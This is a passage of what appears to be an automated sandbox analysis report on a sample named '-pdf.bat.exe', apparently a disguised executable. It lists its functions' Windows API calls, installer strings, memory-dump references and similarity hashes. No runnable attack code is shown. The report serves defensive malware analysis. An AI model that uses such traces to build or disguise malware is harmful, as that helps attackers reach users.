                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                • String ID: N$|B
                                                                                                                                                • API String ID: 3270077613-741270461
                                                                                                                                                • Opcode ID: 6926f728b9a4140239efee31cad9342915eb37f61d6186b76a8037dd33359e50
                                                                                                                                                • Instruction ID: 03ac8205f382ddc68e99412b94d7e0d93baa4fe0dd377c53b404b89af8b9d0ff
                                                                                                                                                • Opcode Fuzzy Hash: 6926f728b9a4140239efee31cad9342915eb37f61d6186b76a8037dd33359e50
                                                                                                                                                • Instruction Fuzzy Hash: F8816EB0644305AFD7109F24DD48A6B7BA8FB98344F40093EF685A72A1CB789945CB6A
                                                                                                                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 128COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 0040102E
                                                                                                                                                • BeginPaint.USER32(?,?), ref: 0040104C
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00401062
                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004010FA
                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401120
                                                                                                                                                • SetBkMode.GDI32(00000000,?), ref: 00401143
                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                                                                                                                                • DrawTextW.USER32(00000000,00428D40,000000FF,?,00000820), ref: 00401171
                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040117F
                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040118E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                • String ID: F
                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                • Opcode ID: 2ca4e0cb8bbe08ec02795cdb68367fd140eecc9f655486cbe37f55fdb25868c2
                                                                                                                                                • Instruction ID: cbd0933a51e0d69d1329980f29ca5745c9819e032560b200aac5586c4a4d24f6
                                                                                                                                                • Opcode Fuzzy Hash: 2ca4e0cb8bbe08ec02795cdb68367fd140eecc9f655486cbe37f55fdb25868c2
                                                                                                                                                • Instruction Fuzzy Hash: C541BF720083509FC7159F65CE4496FBBE9FF88715F150A2EF9D5A62A0CA34C904CFA5
                                                                                                                                                Function 0040641B Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 124memorystringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00000000,?,00406373,?,?), ref: 00406456
                                                                                                                                                • GetShortPathNameW.KERNEL32(00000000,00426E78,00000400), ref: 0040645F
                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00426678,00000400), ref: 0040647C
                                                                                                                                                • wsprintfA.USER32 ref: 0040649A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00426678,C0000000,?,00426678,?), ref: 004064D2
                                                                                                                                                • GlobalAlloc.KERNEL32(?,0000000A), ref: 004064E2
                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406512
                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00426278,00000000,-0000000A,004089A4,00000000,[Rename],00000000,00000000,00000000), ref: 00406532
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00406544
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040654B
                                                                                                                                                  • Part of subcall function 00406A30: GetFileAttributesW.KERNELBASE(00000003,004034D0,C:\Users\user\Desktop\-pdf.bat.exe,80000000,00000003), ref: 00406A34
                                                                                                                                                  • Part of subcall function 00406A30: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 00406A54
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                • String ID: %ls=%ls$[Rename]$xfB$xnB
                                                                                                                                                • API String ID: 2900126502-517554076
                                                                                                                                                • Opcode ID: ac91c1a28502f1bfb87c1199f85f6386a03c8f980d5b1fd238676458d943b8cb
                                                                                                                                                • Instruction ID: 0cce765fd4ac64f64f5847131bacee5d89b3958391fbe683fc7760f607864942
                                                                                                                                                • Opcode Fuzzy Hash: ac91c1a28502f1bfb87c1199f85f6386a03c8f980d5b1fd238676458d943b8cb
                                                                                                                                                • Instruction Fuzzy Hash: 7131F2B02006117AD6207B25AD49F7B3A6CEF41748F16003EF943B62D6DE7CC8128A7C
                                                                                                                                                Function 00406E52 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EC7
                                                                                                                                                • CharNextW.USER32(?,?,?,00000000), ref: 00406ED6
                                                                                                                                                • CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EDB
                                                                                                                                                • CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EF3
                                                                                                                                                Strings
                                                                                                                                                • *?|<>/":, xrefs: 00406EB6
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406E52, 00406E54
                                                                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406E59
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                                                • API String ID: 589700163-2188270913
                                                                                                                                                • Opcode ID: d7cee7299210071b0bd5c0c877b0836f4874a5f45daef98052a11ed8e57e76f7
                                                                                                                                                • Instruction ID: 678fcbdb596b78e8a7eea6de8248b36d7e838f456ea6c1a5848c0ba59b47ba4e
                                                                                                                                                • Opcode Fuzzy Hash: d7cee7299210071b0bd5c0c877b0836f4874a5f45daef98052a11ed8e57e76f7
                                                                                                                                                • Instruction Fuzzy Hash: E211F32950073559DA306B6ACC4097B62E8EF697A1316443BFACAA32C0E77D8D51D2E8
                                                                                                                                                Function 0040585E Relevance: 12.1, APIs: 8, Instructions: 70COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                • Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                                                                                • Instruction ID: 853fd2a938e6063eae5099aa51e4afe06320ee8032e9b574836c5d7031c179f8
                                                                                                                                                • Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
                                                                                                                                                • Instruction Fuzzy Hash: FE21D675500B04EFDB349F28DA48A5B77F4EF057607008A3DE896A26B0DB34E814CF14
                                                                                                                                                Function 004033E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00403402
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403423
                                                                                                                                                • wsprintfW.USER32 ref: 00403452
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E6F
                                                                                                                                                  • Part of subcall function 00405E3D: lstrlenW.KERNEL32(?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E81
                                                                                                                                                  • Part of subcall function 00405E3D: lstrcatW.KERNEL32(00424230,?,?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E9C
                                                                                                                                                  • Part of subcall function 00405E3D: SetWindowTextW.USER32(00424230,00424230), ref: 00405EB4
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?), ref: 00405EDB
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405EF6
                                                                                                                                                  • Part of subcall function 00405E3D: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405F03
                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,00403747,00000000), ref: 00403479
                                                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00403487
                                                                                                                                                  • Part of subcall function 004033CB: MulDiv.KERNEL32(00049694,?,00049694), ref: 004033E2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                • String ID: ... %d%%
                                                                                                                                                • API String ID: 722711167-2449383134
                                                                                                                                                • Opcode ID: bdd0e0c02e783bf097d4f533cddbcf0abc40fd15471b2550623dfac65dc01907
                                                                                                                                                • Instruction ID: f266c3144acc84abeb33af89d5a8a1b628b0ed282eaa896ec301c971e6cb58ec
                                                                                                                                                • Opcode Fuzzy Hash: bdd0e0c02e783bf097d4f533cddbcf0abc40fd15471b2550623dfac65dc01907
                                                                                                                                                • Instruction Fuzzy Hash: 50018470641204EBDB119F64FE8EB593BA8A700B0AF10443EF941F51E0DBB89548CB6C
                                                                                                                                                Function 004057DD Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004057F6
                                                                                                                                                • GetMessagePos.USER32 ref: 004057FE
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00405818
                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040582C
                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405854
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                • String ID: f
                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                • Opcode ID: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                                                                                                                                • Instruction ID: a34ed8a21e94797a74c1091573c129874cd65debd64a168ab9176f0650f2b5a0
                                                                                                                                                • Opcode Fuzzy Hash: c033d2a482c0bbee4868c7629423a8e69750951f4e6b473a84ec653bd2017e87
                                                                                                                                                • Instruction Fuzzy Hash: 98014C7190020CBADB01EF94DD45BEEBBB9EF04710F10812AFA50BA1E0C7B49A51CF54
                                                                                                                                                Function 00403747 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetTimer.USER32(?,?,000000FA,00000000), ref: 00403765
                                                                                                                                                • wsprintfW.USER32 ref: 00403795
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004037A5
                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 004037B7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                • API String ID: 1451636040-1158693248
                                                                                                                                                • Opcode ID: defbe51d6f9882951ad5208393e217e44a68b2759e178f6fe88e35c9064f4801
                                                                                                                                                • Instruction ID: 79e04ba7ff141100257c27fc40fa1ffc2d52e87daa7d5e1ad393195e5ff21367
                                                                                                                                                • Opcode Fuzzy Hash: defbe51d6f9882951ad5208393e217e44a68b2759e178f6fe88e35c9064f4801
                                                                                                                                                • Instruction Fuzzy Hash: E0F044B0640509ABDF206F64DD46BAA3B6CAB00345F00C03EF946F50D0DFB89A559B9D
                                                                                                                                                Function 70312209 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 703112F8: GlobalAlloc.KERNEL32(?,?,703111C4,-000000A0), ref: 70311302
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703122F1
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 70312326
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                • Opcode ID: 7d6f5348038800da63e3a15f30e6e5f227ce40e66b682b972df6cbb4add1852c
                                                                                                                                                • Instruction ID: 07d1aad03000380679f0fd59adeb85f96ba2733e8378c4f2d804f22c97920247
                                                                                                                                                • Opcode Fuzzy Hash: 7d6f5348038800da63e3a15f30e6e5f227ce40e66b682b972df6cbb4add1852c
                                                                                                                                                • Instruction Fuzzy Hash: E5319A32204902DBE72A8F66CC45F6EB7BEFB4D311B21492DF502C7160E77598A2DB60
                                                                                                                                                Function 703110C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 7031116B
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703111AE
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703111CD
                                                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 703111E6
                                                                                                                                                • GlobalFree.KERNEL32 ref: 7031125C
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 703112A7
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703112BF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                • Opcode ID: 4ab2ff3b5c06f1143fe59d4e0f85f98905f48085b9aa2432b574eeda6268ac1f
                                                                                                                                                • Instruction ID: d06b23a83c166b6e817d900fa727c74c20d212ba9dba16e0bad917a4c8184d22
                                                                                                                                                • Opcode Fuzzy Hash: 4ab2ff3b5c06f1143fe59d4e0f85f98905f48085b9aa2432b574eeda6268ac1f
                                                                                                                                                • Instruction Fuzzy Hash: 8D519376500A06DFC758CFA9D841AAEB7BCFB5D300B20492EF946DB360E635E941C751
                                                                                                                                                Function 70312049 Relevance: 7.6, APIs: 5, Instructions: 129memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 703121BF
                                                                                                                                                  • Part of subcall function 703112E1: lstrcpynW.KERNEL32(00000000,?,7031156A,?,703111C4,-000000A0), ref: 703112F1
                                                                                                                                                • GlobalAlloc.KERNEL32(?), ref: 7031212C
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7031214C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37968691201.0000000070311000.00000020.00000001.01000000.00000005.sdmp, Offset: 70310000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37968666099.0000000070310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968717841.0000000070314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37968741619.0000000070316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_70310000_-pdf.jbxd
